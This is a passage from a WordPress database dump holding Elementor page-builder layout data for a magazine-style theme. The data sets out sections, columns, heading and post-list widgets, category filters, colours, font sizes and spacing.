",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1265,452,'_elementor_version','0.4'),(1266,452,'_elementor_css','a:3:{s:4:\"time\";i:1508893715;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1268,453,'_elementor_edit_mode','builder'),(1269,453,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\",\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\